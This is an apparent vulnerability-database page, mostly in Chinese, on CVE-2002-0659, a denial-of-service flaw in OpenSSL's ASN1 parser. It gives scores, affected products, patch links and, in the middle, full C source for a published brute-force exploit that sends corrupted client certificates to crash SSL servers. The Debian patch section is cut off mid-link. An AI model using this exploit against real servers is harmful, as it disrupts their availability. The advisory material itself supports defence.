CVE-2002-0659
CVSS5.0
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-10 15:12:40
NMCOES    

[原文]The ASN1 library in OpenSSL 0.9.6d and earlier, and 0.9.7-beta2 and earlier, allows remote attackers to cause a denial of service via invalid encodings.


[CNNVD]OpenSSL ASN1处理无效编码方式不当导致拒绝服务攻击漏洞(CNNVD-200208-052)

        
        OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。
        OpenSSL的ASN1解释器在处理无效的编码方式时存在漏洞,远程攻击者可能利用此漏洞对使用了ASN1库的应用程序进行拒绝服务攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.1.5Apple Mac OS X 10.1.5
cpe:/a:openssl:openssl:0.9.4OpenSSL Project OpenSSL 0.9.4
cpe:/a:oracle:application_server:1.0.2.2Oracle Application Server 9i 1.0.2.2
cpe:/a:openssl:openssl:0.9.6aOpenSSL Project OpenSSL 0.9.6a
cpe:/a:openssl:openssl:0.9.5OpenSSL Project OpenSSL 0.9.5
cpe:/a:openssl:openssl:0.9.6OpenSSL Project OpenSSL 0.9.6
cpe:/a:oracle:application_server:1.0.2.1sOracle Application Server 9i 1.0.2.1s
cpe:/o:apple:mac_os_x:10.1.4Apple Mac OS X 10.1.4
cpe:/o:apple:mac_os_x:10.1Apple Mac OS X 10.1
cpe:/a:openssl:openssl:0.9.7:beta1OpenSSL Project OpenSSL 0.9.7 beta1
cpe:/a:oracle:corporate_time_outlook_connector:3.3Oracle CorporateTime Outlook Connector 3.3
cpe:/o:apple:mac_os_x:10.0.1Apple Mac OS X 10.0.1
cpe:/a:openssl:openssl:0.9.2bOpenSSL Project OpenSSL 0.9.2b
cpe:/a:oracle:application_serverOracle Application Server
cpe:/a:oracle:corporate_time_outlook_connector:3.1Oracle CorporateTime Outlook Connector 3.1
cpe:/a:oracle:corporate_time_outlook_connector:3.1.2Oracle CorporateTime Outlook Connector 3.1.2
cpe:/o:apple:mac_os_x:10.0.4Apple Mac OS X 10.0.4
cpe:/o:apple:mac_os_x:10.0Apple Mac OS X 10.0
cpe:/a:openssl:openssl:0.9.6bOpenSSL Project OpenSSL 0.9.6b
cpe:/a:openssl:openssl:0.9.6cOpenSSL Project OpenSSL 0.9.6c
cpe:/a:oracle:http_server:9.0.1Oracle HTTP Server 9.0.1
cpe:/o:apple:mac_os_x:10.0.3Apple Mac OS X 10.0.3
cpe:/o:apple:mac_os_x:10.1.3Apple Mac OS X 10.1.3
cpe:/a:openssl:openssl:0.9.5aOpenSSL Project OpenSSL 0.9.5a
cpe:/a:oracle:http_server:9.2.0Oracle HTTP Server 9.2.0
cpe:/o:apple:mac_os_x:10.1.1Apple Mac OS X 10.1.1
cpe:/a:openssl:openssl:0.9.1cOpenSSL Project OpenSSL 0.9.1c
cpe:/o:apple:mac_os_x:10.0.2Apple Mac OS X 10.0.2
cpe:/a:oracle:application_server:1.0.2Oracle Application Server 9i 1.0.2
cpe:/a:openssl:openssl:0.9.6dOpenSSL Project OpenSSL 0.9.6d
cpe:/a:openssl:openssl:0.9.3OpenSSL Project OpenSSL 0.9.3
cpe:/o:apple:mac_os_x:10.1.2Apple Mac OS X 10.1.2
cpe:/a:oracle:corporate_time_outlook_connector:3.1.1Oracle CorporateTime Outlook Connector 3.1.1
cpe:/a:openssl:openssl:0.9.7:beta2OpenSSL Project OpenSSL 0.9.7 beta2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0659
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0659
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-052
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/748355
(UNKNOWN)  CERT-VN  VU#748355
http://www.cert.org/advisories/CA-2002-23.html
(UNKNOWN)  CERT  CA-2002-23
http://www.securityfocus.com/bid/5366
(UNKNOWN)  BID  5366
http://www.iss.net/security_center/static/9718.php
(UNKNOWN)  XF  openssl-asn1-parser-dos(9718)
http://rhn.redhat.com/errata/RHSA-2002-164.html
(UNKNOWN)  REDHAT  RHSA-2002:164
http://rhn.redhat.com/errata/RHSA-2002-161.html
(UNKNOWN)  REDHAT  RHSA-2002:161
http://rhn.redhat.com/errata/RHSA-2002-160.html
(UNKNOWN)  REDHAT  RHSA-2002:160
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000516
(UNKNOWN)  CONECTIVA  CLA-2002:516
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:33.openssl.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-02:33
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-033.1.txt
(UNKNOWN)  CALDERA  CSSA-2002-033.1
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-033.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-033.0

- 漏洞信息

OpenSSL ASN1处理无效编码方式不当导致拒绝服务攻击漏洞
中危 边界条件错误
2002-08-12 00:00:00 2006-09-21 00:00:00
远程  
        
        OpenSSL是一种开放源码的SSL实现,用来实现网络通信的高强度加密,现在被广泛地用于各种网络应用程序中。
        OpenSSL的ASN1解释器在处理无效的编码方式时存在漏洞,远程攻击者可能利用此漏洞对使用了ASN1库的应用程序进行拒绝服务攻击。
        

- 公告与补丁

        厂商补丁:
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2002-033.0)以及相应补丁:
        CSSA-2002-033.0:Linux: multiple vulnerabilities in openssl
        链接:
        http://www.caldera.com/support/security/advisories/CSSA-2002-033.0.txt

        补丁下载:
        * OpenLinux 3.1.1 Server
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        *. OpenLinux 3.1.1 Workstation
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        *. OpenLinux 3.1 Server
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        *. OpenLinux 3.1 Workstation
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-0.9.6-18.i386.rpm
         ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-033.0/RPMS/openssl-devel-static-0.9.6-18.i386.rpm
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2002:513)以及相应补丁:
        CLA-2002:513:openssl
        链接:
        http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000513

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-0.9.6-4U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/openssl-devel-0.9.6-4U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/openssl-0.9.6-4U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-devel-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-devel-static-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-doc-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/openssl-progs-0.9.6a-3U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/openssl-0.9.6a-3U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-devel-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-devel-static-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-doc-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/openssl-progs-0.9.6c-2U8_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/openssl-0.9.6c-2U8_1cl.src.rpm
        Conectiva Linux version 6.0及以上版本的用户可以使用apt进行RPM包的更新:
        - 把以下的文本行加入到/etc/apt/sources.list文件中:
        
        rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates
        (如果你不是使用6.0版本,用合适的版本号代替上面的6.0)
        - 执行: apt-get update
        - 更新以后,再执行: apt-get upgrade
        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-136-1)以及相应补丁:
        DSA-136-1:Multiple OpenSSL problems
        链接:
        http://www.debian.org/security/2002/dsa-136

        补丁下载:
        Source archives:
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.6c-2.woody.0.dsc

        Size/MD5 checksum: 782 de4c7b85648c7953dc31d3a89c38681c
        
        http://security.debian.org/pool/updates/main/o/openssl/openssl_0

- 漏洞信息 (23199)

OpenSSL ASN.1 Parsing Vulnerabilities (EDBID:23199)
multiple remote
2003-10-09 Verified
0 Syzop
N/A [点击下载]
source: http://www.securityfocus.com/bid/8732/info

Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. Attackers could exploit these issues to cause a denial of service or to execute arbitrary code. 

/* Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b)
 * written by Bram Matthys (Syzop) on Oct 9 2003.
 *
 * This program sends corrupt client certificates to the SSL
 * server which will 1) crash it 2) create lots of error messages,
 * and/or 3) result in other "interresting" behavior.
 *
 * I was able to crash my own ssl app in 5-15 attempts,
 * apache-ssl only generated error messages but after several hours
 * some childs went into some kind of eat-all-cpu-loop... so YMMV.
 *
 * It's quite ugly but seems to compile at Linux/FreeBSD.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/signal.h>
#include <arpa/nameser.h>
#include <sys/time.h>
#include <time.h>
#include <errno.h>

char buf[8192];

/* This was simply sniffed from an stunnel session */
const char dacrap[] =
"\x16\x03\x00\x02\x47\x0b\x00\x02\x43\x00\x02\x40\x00\x02\x3d\x30\x82"
"\x02\x39\x30\x82\x01\xa2\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06"
"\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x30\x57\x31\x0b\x30"
"\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06\x03\x55"
"\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31\x1f\x30"
"\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c\x20\x44"
"\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12\x30\x10"
"\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x30"
"\x1e\x17\x0d\x30\x33\x30\x36\x31\x32\x32\x33\x35\x30\x34\x39\x5a\x17"
"\x0d\x30\x34\x30\x36\x31\x31\x32\x33\x35\x30\x34\x39\x5a\x30\x57\x31"
"\x0b\x30\x09\x06\x03\x55\x04\x06\x13\x02\x50\x4c\x31\x13\x30\x11\x06"
"\x03\x55\x04\x08\x13\x0a\x53\x6f\x6d\x65\x2d\x53\x74\x61\x74\x65\x31"
"\x1f\x30\x1d\x06\x03\x55\x04\x0a\x13\x16\x53\x74\x75\x6e\x6e\x65\x6c"
"\x20\x44\x65\x76\x65\x6c\x6f\x70\x65\x72\x73\x20\x4c\x74\x64\x31\x12"
"\x30\x10\x06\x03\x55\x04\x03\x13\x09\x6c\x6f\x63\x61\x6c\x68\x6f\x73"
"\x74\x30\x81\x9f\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x01"
"\x05\x00\x03\x81\x8d\x00\x30\x81\x89\x02\x81\x81\x00\xe6\x95\x5c\xc0"
"\xcb\x03\x78\xf1\x1e\xaa\x45\xb7\xa4\x10\xd0\xc1\xd5\xc3\x8c\xcc\xca"
"\x17\x7b\x48\x9a\x21\xf2\xfa\xc3\x25\x07\x0b\xb7\x69\x17\xca\x59\xf7"
"\xdf\x67\x7b\xf1\x72\xd5\x05\x61\x73\xe8\x70\xbf\xb9\xfa\xc8\x4b\x03"
"\x41\x62\x71\xf9\xf5\x4e\x28\xb8\x3b\xe4\x33\x76\x47\xcc\x1e\x04\x71"
"\xda\xc4\x0b\x05\x46\xf4\x52\x72\x99\x43\x36\xf7\x37\x6d\x04\x1c\x7a"
"\xde\x2a\x0c\x45\x4a\xb6\x48\x33\x3a\xad\xec\x16\xcc\xe7\x99\x58\xfd"
"\xef\x4c\xc6\xdd\x39\x76\xb6\x50\x76\x2a\x7d\xa0\x20\xee\xb4\x2c\xe0"
"\xd2\xc9\xa1\x2e\x31\x02\x03\x01\x00\x01\xa3\x15\x30\x13\x30\x11\x06"
"\x09\x60\x86\x48\x01\x86\xf8\x42\x01\x01\x04\x04\x03\x02\x06\x40\x30"
"\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00\x03\x81\x81"
"\x00\x9f\xff\xa9\x93\x70\xb9\xae\x48\x47\x09\xa1\x11\xbf\x01\x34\xbf"
"\x1f\x1e\xed\x88\x3e\x57\xe0\x37\x72\x0d\xec\xc7\x21\x44\x12\x99\x3a"
"\xfa\xaf\x79\x57\xf4\x7f\x99\x68\x37\xb1\x17\x83\xd3\x51\x44\xbd\x50"
"\x67\xf8\xd6\xd0\x93\x00\xbb\x53\x3d\xe2\x3d\x34\xfc\xed\x60\x85\xea"
"\x67\x7f\x91\xec\xfa\xe3\xd8\x78\xa2\xf4\x61\xfa\x77\xa3\x3f\xe4\xb1"
"\x41\x95\x47\x23\x03\x1c\xbf\x2e\x40\x77\x82\xef\xa0\x17\x82\x85\x03"
"\x90\x35\x4e\x85\x0d\x0f\x4d\xea\x16\xf5\xce\x15\x21\x10\xf9\x56\xd0"
"\xa9\x08\xe5\xf9\x9d\x5c\x43\x75\x33\xe2\x16\x03\x00\x00\x84\x10\x00"
"\x00\x80\x6e\xe4\x26\x03\x97\xb4\x5d\x58\x70\x36\x98\x31\x62\xd4\xef"
"\x7b\x4e\x53\x99\xad\x72\x27\xaf\x05\xd4\xc9\x89\xca\x04\xf1\x24\xa4"
"\xa3\x82\xb5\x89\x3a\x2e\x8f\x3f\xf3\xe1\x7e\x52\x11\xb2\xf2\x29\x95"
"\xe0\xb0\xe9\x3f\x29\xaf\xc1\xcd\x77\x54\x6a\xeb\xf6\x81\x6b\xd5\xd6"
"\x0a\x3d\xc3\xff\x6f\x76\x4a\xf7\xc9\x61\x9f\x7b\xb3\x25\xe0\x2b\x09"
"\x53\xcf\x06\x1c\x82\x9c\x48\x37\xfa\x71\x27\x97\xec\xae\x6f\x4f\x75"
"\xb1\xa5\x84\x99\xf5\xed\x8c\xba\x0f\xd5\x33\x31\x61\x5d\x95\x77\x65"
"\x8d\x89\x0c\x7d\xa7\xa8\x95\x5a\xc7\xb8\x35\x16\x03\x00\x00\x86\x0f"
"\x00\x00\x82\x00\x80\x78\x1d\xbd\x86\xcb\x6e\x06\x88\x57\x9e\x3d\x21"
"\x7e\xca\xd1\x75\xff\x33\xef\x48\x4d\x88\x96\x84\x8c\x2f\xfb\x92\x1d"
"\x15\x28\xef\xe0\xd3\x4d\x20\xe9\xae\x6c\x5c\xed\x46\xc0\xef\x4e\xb4"
"\xe4\xcf\xe9\x73\xb8\xd2\x8b\xe6\x5e\xb9\x0c\x67\xbe\x17\x13\x31\x3f"
"\xe5\xe1\x9a\x2d\xfe\xb4\xd6\xdb\x8f\xbc\x15\x22\x10\x65\xe1\xad\x5f"
"\x00\xd0\x48\x8d\x4e\xa7\x08\xbd\x5c\x40\x77\xb8\xa9\xbe\x58\xb0\x15"
"\xd2\x4c\xc8\xa1\x79\x63\x25\xeb\xa1\x32\x61\x3b\x49\x82\xf1\x3a\x70"
"\x80\xf8\xdc\xf7\xf9\xfc\x50\xc7\xa2\x5d\xe4\x30\x8e\x09\x14\x03\x00"
"\x00\x01\x01\x16\x03\x00\x00\x40\xfe\xc2\x1f\x94\x7e\xf3\x0b\xd1\xe1"
"\x5c\x27\x34\x7f\x01\xe9\x51\xd3\x18\x33\x9a\x99\x48\x6e\x13\x6f\x82"
"\xb2\x2c\xa5\x7b\x36\x5d\x85\xf5\x17\xe3\x4f\x2a\x04\x15\x2d\x0e\x2f"
"\x2c\xf9\x1c\xf8\x9e\xac\xd5\x6c\x20\x81\xe5\x22\x54\xf1\xe1\xd0\xfd"
"\x64\x42\xfb\x34";

#define CRAPLEN (sizeof(dacrap)-1)


int send_hello()
{
int len;
char *p = buf;
        *p++ = 22;                              /* Handshake */
        PUTSHORT(0x0300, p);    /* SSL v3 */
        PUTSHORT(85, p);                /* Length will be 85 bytes */

        *p++ = 1;                               /* Client hello */

        *p++ = 0;                               /* Length: */
        PUTSHORT(81, p);                /* 81 bytes */

        PUTSHORT(0x0300, p);    /* SSL v3 */
        PUTLONG(0xffffffff, p); /* Random.gmt_unix_time */

        /* Now 28 bytes of random data... (7x4bytes=28) */
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);
        PUTLONG(0x11223344, p);

        *p++ = 0;                               /* Session ID 0 */

        PUTSHORT(42, p);                /* Cipher Suites Length */
        PUTSHORT(0x16, p);
        PUTSHORT(0x13, p);
        PUTSHORT(0x0a, p);
        PUTSHORT(0x66, p);
        PUTSHORT(0x07, p);
        PUTSHORT(0x05, p);
        PUTSHORT(0x04, p);
        PUTSHORT(0x65, p);
        PUTSHORT(0x64, p);
        PUTSHORT(0x63, p);
        PUTSHORT(0x62, p);
        PUTSHORT(0x61, p);
        PUTSHORT(0x60, p);
        PUTSHORT(0x15, p);
        PUTSHORT(0x12, p);
        PUTSHORT(0x09, p);
        PUTSHORT(0x14, p);
        PUTSHORT(0x11, p);
        PUTSHORT(0x08, p);
        PUTSHORT(0x06, p);
        PUTSHORT(0x03, p);

        *p++ = 1;                               /* Compresion method length: 1 */
        *p++ = 0;                               /* (null) */

        len = p - buf;
        return len;
}

int send_crap()
{
        memcpy(buf, dacrap, CRAPLEN);
        return CRAPLEN;
}



void corruptor(char *buf, int len)
{
int cb, i, l;

        cb = rand()%15+1; /* bytes to corrupt */

        for (i=0; i < cb; i++)
        {
                l = rand()%len;
                buf[l] = rand()%256;
        }
}

void diffit()
{
int i;
        printf("DIFF:\n");
        for (i=0; i < CRAPLEN; i++)
        {
                if (buf[i] != dacrap[i])
                        printf("Offset %d: 0x%x -> 0x%x\n", i, dacrap[i], buf[i]);
        }
        printf("*****\n");
}


int main(int argc, char *argv[])
{
        struct sockaddr_in addr;
        int s, port = 0, first = 1, len;
        char *host = NULL;
        unsigned int seed;
        struct timeval tv;

        printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");

        if (argc != 3) {
                fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
                exit(1);
        }

        host = argv[1];
        port = atoi(argv[2]);
        if ((port < 1) || (port > 65535)) {
                fprintf(stderr, "Port out of range (%d)\n", port);
                exit(1);
        }

        gettimeofday(&tv, NULL);
        seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);

        printf("seed = %u\n", seed);
        srand(seed);

        memset(&addr, 0, sizeof(addr));


        signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */

while(1)
{

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
                fprintf(stderr, "Socket error: %s\n", strerror(errno));
                exit(EXIT_FAILURE);
        }
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
        addr.sin_addr.s_addr = inet_addr(host);
        if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
                fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
                if (!first)
                        diffit();
                exit(EXIT_FAILURE);
        }
        first = 0;
        printf("."); fflush(stdout);

        len = send_hello();
        write(s, buf, len);
        len = send_crap();
        corruptor(buf, len);
        write(s, buf, len);
        usleep(1000); /* wait.. */
        close(s);
}

        exit(EXIT_SUCCESS);
}

		

- 漏洞信息

3943
OpenSSL ASN.1 Parser Invalid Encoding Handling Remote DoS
Local Access Required, Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

OpenSSL's ASN.1 parser contains a flaw that may allow a malicious user to cause Denial of Service conditions. The issue is triggered when invalid ASN.1 encodings are supplied to the parser. It is possible that the flaw may allow crashing of OpenSSL, resulting in a loss of availability.

- 时间线

2002-07-30 Unknow
2002-07-30 Unknow

- 解决方案

Upgrade to version 0.9.6e or higher and recompile all applications that were statically linked to OpenSSL, as that has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch to affected versions.

- 相关参考

- 漏洞作者

- 漏洞信息

OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
Boundary Condition Error 5366
Yes No
2002-07-30 12:00:00 2009-07-11 02:56:00
Discovered by Adi Stav <stav@mercury.co.il> and James Yonan <jim@ntlp.com>.

- 受影响的程序版本

Secure Computing SafeWord PremierAccess 3.1
S.u.S.E. SuSE eMail Server 3.1
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle9i Application Server 1.0.2
Oracle Oracle9i Application Server
- Compaq Tru64 5.1
- Compaq Tru64 5.0 f
- Compaq Tru64 5.0 a
- Compaq Tru64 5.0
- Compaq Tru64 4.0 g
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.26
- HP HP-UX 10.20
- HP HP-UX 10.16
- HP HP-UX 10.10
- HP HP-UX 10.9
- HP HP-UX 10.8
- HP HP-UX 10.1 0
- HP HP-UX 10.0 1
- HP HP-UX 10.0
- HP HP-UX 9.10
- HP HP-UX 9.9
- HP HP-UX 9.8
- HP HP-UX 9.7
- HP HP-UX 9.6
- HP HP-UX 9.5
- HP HP-UX 9.4
- HP HP-UX 9.3
- HP HP-UX 9.1
- HP HP-UX 9.0
- HP HP-UX 8.9
- HP HP-UX 8.8
- HP HP-UX 8.7
- HP HP-UX 8.6
- HP HP-UX 8.5
- HP HP-UX 8.4
- HP HP-UX 8.2
- HP HP-UX 8.1
- HP HP-UX 8.0
- HP HP-UX 7.8
- HP HP-UX 7.6
- HP HP-UX 7.4
- HP HP-UX 7.2
- HP HP-UX 7.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 4.2.1
- IBM AIX 4.2
- IBM AIX 4.1.5
- IBM AIX 4.1.4
- IBM AIX 4.1.3
- IBM AIX 4.1.2
- IBM AIX 4.1.1
- IBM AIX 4.1
- IBM AIX 4.0
- IBM AIX 3.2.5
- IBM AIX 3.2.4
- IBM AIX 3.2
- IBM AIX 3.1
- IBM AIX 3.0 x
- IBM AIX 2.2.1
- IBM AIX 1.3
- IBM AIX 1.2.1
- IBM AIX 5.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 2.5.1 _x86
- Sun Solaris 2.5.1
- Sun Solaris 1.1.4 -JL
- Sun Solaris 1.1.4
- Sun Solaris 1.1.3 _U1
- Sun Solaris 1.1.3
- Sun Solaris 1.1.2
- Sun Solaris 1.1.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86HW5/98
- Sun Solaris 2.6_x86HW3/98
- Sun Solaris 2.6_x86
- Sun Solaris 2.6 HW5/98
- Sun Solaris 2.6 HW3/98
- Sun Solaris 2.6
- Sun Solaris 2.5_x86
- Sun Solaris 2.5
- Sun Solaris 2.4_x86
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun Solaris 2.2
- Sun Solaris 2.1
- Sun Solaris 2.0
- Sun Solaris 1.2
- Sun Solaris 1.1
Oracle Oracle HTTP Server 9.2 .0
+ Apache Software Foundation Apache 1.3.22
Oracle Oracle HTTP Server 9.0.1
Oracle CorporateTime Outlook Connector 3.3
Oracle CorporateTime Outlook Connector 3.1.2
Oracle CorporateTime Outlook Connector 3.1.1
Oracle CorporateTime Outlook Connector 3.1
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
Opera Software Opera Web Browser 6.0.2 win32
Opera Software Opera Web Browser 6.0.2 linux
Opera Software Opera Web Browser 6.0.1 win32
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
